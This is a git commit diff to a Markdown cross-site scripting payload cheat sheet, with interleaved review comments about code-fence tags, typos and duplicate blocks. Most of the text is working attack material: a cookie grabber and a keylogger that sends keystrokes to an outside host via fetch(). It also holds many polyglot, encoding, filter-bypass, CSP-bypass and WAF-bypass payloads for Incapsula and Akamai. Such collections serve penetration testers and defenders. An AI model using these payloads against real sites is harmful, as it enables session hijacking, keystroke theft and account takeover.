XSS Colors highlighting + JS code eval

Swissky 2018-06-27 20:00:17 +02:00
parent a7439d812d
commit 4a0fc27578


@ -8,11 +8,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in files](#xss-in-files) - [XSS in files](#xss-in-files)
- [Polyglot XSS](#polyglot-xss) - [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [Common WAF Bypas](#common-waf-bypass)
## Exploit code or POC ## Exploit code or POC
Cookie grabber for XSS Cookie grabber for XSS
``` ```php
<?php <?php
// How to use it // How to use it
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script> # <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
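Review bot: the new table-of-contents entry `- [Common WAF Bypas](#common-waf-bypass)` misspells the link text; the anchor already matches the new `## Common WAF Bypass` heading added at the bottom of this commit, so only the visible text needs to become `Common WAF Bypass` for the TOC and the section title to agree.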
@ -27,7 +28,7 @@ fclose($fp);
``` ```
Keylogger for XSS Keylogger for XSS
``` ```html
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
``` ```
@ -41,13 +42,13 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
## Identify an XSS endpoint ## Identify an XSS endpoint
``` ```javascript
<script>debugger;</script> <script>debugger;</script>
``` ```
## XSS in HTML/Applications ## XSS in HTML/Applications
XSS Basic XSS Basic
``` ```javascript
Basic payload Basic payload
<script>alert('XSS')</script> <script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt> <scr<script>ipt>alert('XSS')</scr<script>ipt>
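Review bot: the fence tags are inconsistent between hunks: `<script>debugger;</script>` and the basic `<script>alert('XSS')</script>` payloads are HTML markup but get ```` ```javascript ````, while the keylogger `<img src=x onerror=...>` block in the previous hunk gets ```` ```html ````. Pick one tag for HTML-markup payloads (`html` fits) and keep `javascript` for blocks that are pure JS such as `String.fromCharCode(88,83,83)` or the `eval('ale'+'rt(0)')` list, otherwise the highlighting this commit is adding will colour tags and attributes wrongly.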
@ -74,7 +75,7 @@ Svg payload
``` ```
XSS for HTML5 XSS for HTML5
``` ```javascript
<body onload=alert(/XSS/.source)> <body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)> <input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)>
@ -89,14 +90,14 @@ XSS for HTML5
``` ```
XSS using script tag (external payload) XSS using script tag (external payload)
``` ```javascript
<script src=14.rs> <script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload you can alsoo specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain) e.g: 14.rs/#alert(document.domain)
``` ```
XSS in META tag XSS in META tag
``` ```javascript
Base64 encoded Base64 encoded
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
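Review bot: the context lines `you can alsoo specify an arbitratry payload with 14.rs/#payload` carry two typos (`also`, `arbitrary`); since this hunk already touches the block's opening fence, fix them in the same commit. Those two explanatory lines are also prose sitting inside the code fence, so they would read better moved above the fence, as is done for "Base64 encoded" in the META block below.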
@ -107,24 +108,24 @@ With an additional URL
``` ```
XSS in Hidden input XSS in Hidden input
``` ```javascript
<input type="hidden" accesskey="X" onclick="alert(1)"> <input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event Use CTRL+SHIFT+X to trigger the onclick event
``` ```
DOM XSS DOM XSS
``` ```javascript
#"><img src=/ onerror=alert(2)> #"><img src=/ onerror=alert(2)>
``` ```
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
``` ```javascript
-(confirm)(document.domain)// -(confirm)(document.domain)//
; alert(1);// ; alert(1);//
``` ```
XSS URL XSS URL
``` ```javascript
URL/<svg onload=alert(1)> URL/<svg onload=alert(1)>
URL/<script>alert('XSS');// URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)> URL/<input autofocus onfocus=alert(1)>
@ -133,7 +134,7 @@ URL/<input autofocus onfocus=alert(1)>
## XSS in wrappers javascript and data URI ## XSS in wrappers javascript and data URI
XSS with javascript: XSS with javascript:
``` ```javascript
javascript:prompt(1) javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
@ -151,7 +152,7 @@ java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r) java%0dscript:alert(1) - CR (\r)
Using the escape character Using the escape character
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
Using the newline and a comment // Using the newline and a comment //
javascript://%0Aalert(1) javascript://%0Aalert(1)
@ -159,19 +160,19 @@ javascript://anything%0D%0A%0D%0Awindow.alert(1)
``` ```
XSS with data: XSS with data:
``` ```javascript
data:text/html,<script>alert(0)</script> data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
``` ```
XSS with vbscript: only IE XSS with vbscript: only IE
``` ```javascript
vbscript:msgbox("XSS") vbscript:msgbox("XSS")
``` ```
## XSS in files ## XSS in files
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
``` ```xml
<name> <name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value> <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name> </name>
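Review bot: the `vbscript:msgbox("XSS")` block is tagged ```` ```javascript ```` although the heading says it is VBScript and IE-only; use `vbscript` or leave the fence untagged rather than mislabel it. In the same hunk, the unchanged context line `** NOTE:**` has a space after the opening `**`, so Markdown will not render it as bold; it should be `**NOTE:**`.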
@ -179,7 +180,7 @@ vbscript:msgbox("XSS")
XSS in XML XSS in XML
``` ```xml
<html> <html>
<head></head> <head></head>
<body> <body>
@ -190,7 +191,7 @@ XSS in XML
XSS in SVG XSS in SVG
``` ```xml
<?xml version="1.0" standalone="no"?> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
@ -203,7 +204,7 @@ XSS in SVG
``` ```
XSS in SVG (short) XSS in SVG (short)
``` ```javascript
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
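Review bot: `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>` is tagged ```` ```javascript ```` while the full SVG document directly above it (the `<?xml version="1.0" standalone="no"?>` block) is tagged ```` ```xml ````; both are SVG markup, so tag the short form `xml` as well.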
@ -229,7 +230,7 @@ more payloads in ./files
XSS in SWF flash application XSS in SWF flash application
``` ```javascript
flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1) flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
@ -250,7 +251,7 @@ phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domai
XSS in CSS XSS in CSS
``` ```html
<!DOCTYPE html> <!DOCTYPE html>
<html> <html>
<head> <head>
@ -270,27 +271,27 @@ div {
## Polyglot XSS ## Polyglot XSS
Polyglot XSS - 0xsobky Polyglot XSS - 0xsobky
``` ```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
``` ```
Polyglot XSS - Ashar Javed Polyglot XSS - Ashar Javed
``` ```javascript
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
``` ```
Polyglot XSS - Mathias Karlsson Polyglot XSS - Mathias Karlsson
``` ```javascript
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)// " onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
``` ```
Polyglot XSS - Rsnake Polyglot XSS - Rsnake
``` ```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
``` ```
Polyglot XSS - Daniel Miessler Polyglot XSS - Daniel Miessler
``` ```javascript
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
@ -306,11 +307,11 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
``` ```javascript
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``> -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
``` ```
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
``` ```javascript
<svg%0Ao%00nload=%09((pro\u006dpt))()// <svg%0Ao%00nload=%09((pro\u006dpt))()//
``` ```
@ -319,28 +320,40 @@ Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
## Filter Bypass and exotic payloads ## Filter Bypass and exotic payloads
Bypass case sensitive Bypass case sensitive
``` ```javascript
<sCrIpt>alert(1)</ScRipt> <sCrIpt>alert(1)</ScRipt>
``` ```
Bypass tag blacklist Bypass tag blacklist
``` ```javascript
<script x> <script x>
<script x>alert('XSS')<script y> <script x>alert('XSS')<script y>
``` ```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari Bypass word blacklist with code evaluation
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
``` ```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```javascript
<img src='1' onerror='alert(0)' < <img src='1' onerror='alert(0)' <
``` ```
Bypass quotes for string Bypass quotes for string
``` ```javascript
String.fromCharCode(88,83,83) String.fromCharCode(88,83,83)
``` ```
Bypass quotes in script tag Bypass quotes in script tag
``` ```javascript
http://localhost/bla.php?test=</script><script>alert(1)</script> http://localhost/bla.php?test=</script><script>alert(1)</script>
<html> <html>
<script> <script>
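Review bot: the new "Bypass word blacklist with code evaluation" block repeats, line for line, seven payloads that the same commit also adds further down in the `@404death` block (`eval('ale'+'rt(0)');`, `Function("ale"+"rt(1)")();`, `new Function`al\ert\`6\``;`, `setTimeout('ale'+'rt(2)');`, `setInterval('ale'+'rt(10)');` and both `Set.constructor` variants). Keep the technique in one place: either drop this block and rely on the attributed, fuller list below, or keep this block and remove the duplicates from the later one, so readers do not get the same payloads twice in one section.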
@ -350,46 +363,46 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
``` ```
Bypass quotes in mousedown event Bypass quotes in mousedown event
``` ```javascript
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
You can bypass a single quote with &#39; in an on mousedown event handler You can bypass a single quote with &#39; in an on mousedown event handler
``` ```
Bypass dot filter Bypass dot filter
``` ```javascript
<script>window['alert'](document['domain'])<script> <script>window['alert'](document['domain'])<script>
``` ```
Bypass parenthesis for string - Firefox Bypass parenthesis for string - Firefox
``` ```javascript
alert`1` alert`1`
``` ```
Bypass onxxxx= blacklist Bypass onxxxx= blacklist
``` ```javascript
<object onafterscriptexecute=confirm(0)> <object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)>
``` ```
Bypass onxxx= filter with a null byte/vertical tab - IE/Safari Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
``` ```javascript
<img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) /> <img src='1' onerror\x0b=alert(0) />
``` ```
Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari
``` ```javascript
<img src='1' onerror/=alert(0) /> <img src='1' onerror/=alert(0) />
``` ```
Bypass space filter with "/" - IE/Firefox/Chrome/Safari Bypass space filter with "/" - IE/Firefox/Chrome/Safari
``` ```javascript
<img/src='1'/onerror=alert(0)> <img/src='1'/onerror=alert(0)>
``` ```
Bypass space filter with 0x0c/^L Bypass space filter with 0x0c/^L
``` ```javascript
<svg onload = alert(1) > <svg onload = alert(1) >
@ -400,12 +413,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
Bypass document blacklist Bypass document blacklist
``` ```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
``` ```
Bypass using javascript inside a string Bypass using javascript inside a string
``` ```javascript
<script> <script>
foo="text </script><script>alert(1)</script>"; foo="text </script><script>alert(1)</script>";
</script> </script>
@ -413,7 +426,7 @@ foo="text </script><script>alert(1)</script>";
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
``` ```javascript
window['alert'](0) window['alert'](0)
parent['alert'](1) parent['alert'](1)
self['alert'](2) self['alert'](2)
@ -430,8 +443,32 @@ content['alert'](6)
[12].forEach(alert); [12].forEach(alert);
``` ```
Bypass using an alternate way to trigger an alert Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](5);
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);
open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
``` ```
Bypass using an alternate way to trigger an alert
```javascript
var i = document.createElement("iframe"); var i = document.createElement("iframe");
i.onload = function(){ i.onload = function(){
i.contentWindow.alert(1); i.contentWindow.alert(1);
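Review bot: the new heading `Bypass using an alternate way to execute an alert - [@404death](...)` is identical to the preceding section's heading except for the attribution, yet the content differs: the earlier block is about alternative callers (`window['alert'](0)`, `parent['alert'](1)`), while this one is about rebuilding the blacklisted word (`'ale'+'rt'`, `8680439..toString(30)`, `/al/.source+/ert/.source`, `'al\x65rt'`). Give it a title that says so, for example "Bypass word blacklist by reconstructing the function name", and note that the `eval`, `Function`, `setTimeout`, `setInterval` and `Set.constructor` lines here also appear verbatim in the block this commit adds earlier in the file.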
@ -452,12 +489,12 @@ XSSObject.proxy(window, 'alert', 'window.alert', false);
``` ```
Bypass ">" using nothing #trololo (you don't need to close your tags) Bypass ">" using nothing #trololo (you don't need to close your tags)
``` ```javascript
<svg onload=alert(1)// <svg onload=alert(1)//
``` ```
Bypass ';' using another character Bypass ';' using another character
``` ```javascript
'te' * alert('*') * 'xt'; 'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt'; 'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt'; 'te' % alert('%') % 'xt';
@ -476,23 +513,23 @@ Bypass ';' using another character
``` ```
Bypass using HTML encoding Bypass using HTML encoding
``` ```javascript
%26%2397;lert(1) %26%2397;lert(1)
``` ```
Bypass using Katakana (https://github.com/aemkei/katakana.js) Bypass using Katakana (https://github.com/aemkei/katakana.js)
``` ```javascript
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
``` ```
Bypass using Octal encoding Bypass using Octal encoding
``` ```javascript
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
``` ```
Bypass using Unicode Bypass using Unicode
``` ```javascript
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<) transformed into U+003C LESS­THAN SIGN (<)
@ -517,7 +554,7 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
``` ```
Bypass using Unicode converted to uppercase Bypass using Unicode converted to uppercase
``` ```javascript
İ (%c4%b0).toLowerCase() => i İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf) .toUpperCase() => S ſ (%c5%bf) .toUpperCase() => S
@ -528,7 +565,7 @@ Bypass using Unicode converted to uppercase
``` ```
Bypass using overlong UTF-8 Bypass using overlong UTF-8
``` ```javascript
< = %C0%BC = %E0%80%BC = %F0%80%80%BC < = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE > = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
@ -538,24 +575,24 @@ Bypass using overlong UTF-8
``` ```
Bypass using UTF-7 Bypass using UTF-7
``` ```javascript
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
``` ```
Bypass using UTF-16be Bypass using UTF-16be
``` ```javascript
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
``` ```
Bypass using UTF-32 Bypass using UTF-32
``` ```js
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
``` ```
Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.) Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)
BOM character allows you to override charset of the page BOM character allows you to override charset of the page
``` ```js
BOM Character for UTF-16 Encoding: BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE Little Endian : 0xFF 0xFE
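Review bot: the UTF-32 and BOM fences are tagged ```` ```js ```` whereas every other fence in this commit uses ```` ```javascript ````; the two spellings may highlight differently depending on the renderer, so use one consistently. Neither block contains JavaScript (they are percent-encoded byte sequences and a table of BOM bytes), so an untagged or `text` fence would also be more honest than either tag.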
@ -569,7 +606,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
//google.com/complete/search?client=chrome&jsonp=alert(1); //google.com/complete/search?client=chrome&jsonp=alert(1);
``` ```js
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
``` ```
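Review bot: the context line `//google.com/complete/search?client=chrome&jsonp=alert(1);` sits outside the fence as prose and will render as a bare line of text; move it inside the fenced block together with the `<script/src=...>` line, since the two are the same payload in URL form and in tag form. This fence is also tagged `js` rather than the `javascript` used elsewhere in the commit.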
@ -583,7 +620,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
``` ```
Exotic payloads Exotic payloads
``` ```javascript
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script> <script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~> <script ~~~>confirm(1)</script ~~~>
@ -597,13 +634,20 @@ Exotic payloads
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
``` ```
## Incapsula WAF Bypass - 8th march ## Common WAF Bypass
```
### Incapsula WAF Bypass - 8th march
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
``` ```
### Akamai WAF bypass by @zseano - 18th june
```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## More fun ? ## More fun ?
This section will be used for the "fun/interesting/useless" stuff. This section will be used for the "fun/interesting/useless" stuff.
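Review bot: the new `### Akamai WAF bypass by @zseano - 18th june` entry gives only a day and month and no source, while the other attributed payloads in this file link to the author's tweet (`@brutelogic`, `@s0md3v`, `@apfeifer27`); add the year (the commit date is 2018-06-27) and a link to where `?"></script><base%20c%3D=href%3Dhttps:\mysite>` was published so readers can check the context the bypass was reported in. The same applies to the inherited `### Incapsula WAF Bypass - 8th march` heading now that both sit under the new `## Common WAF Bypass` section.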